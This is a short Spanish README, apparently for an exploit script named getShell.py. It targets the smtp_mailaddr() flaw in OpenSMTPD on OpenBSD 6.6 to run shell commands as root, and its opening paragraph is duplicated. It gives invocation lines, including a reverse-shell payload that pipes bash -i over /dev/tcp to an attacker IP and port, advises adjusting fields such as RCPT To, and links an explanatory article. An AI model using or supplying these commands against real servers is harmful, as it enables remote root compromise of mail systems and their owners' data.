
Esta vulnerabilidad existe en la función “smtp_mailaddr()” del servidor de correo OpenSMTPD de OpenBSD, y afecta a OpenBSD versión 6.6. Esto permite a un atacante ejecutar comandos de shell arbitrarios como “sleep 66” como usuario root.
Esta vulnerabilidad existe en la función “smtp_mailaddr()” del servidor de correo OpenSMTPD de OpenBSD, y afecta a OpenBSD versión 6.6. Esto permite a un atacante ejecutar comandos de shell arbitrarios como “sleep 66” como usuario root
python3 getShell.py <targetIp> <targetPort> <command>
Si necesitas una reverse shell, ejecútalo así
python3 getShell.py <TargetIp> <TargetPort> 'bash -c "exec bash -i &> /dev/tcp/IP/PORT <&1"'
Cambia algunas cosas en este exploit como RCPT To y algo más (si es necesario)
Consulta este artículo para una explicación más clara
https://blog.firosolutions.com/exploits/opensmtpd-remote-vulnerability/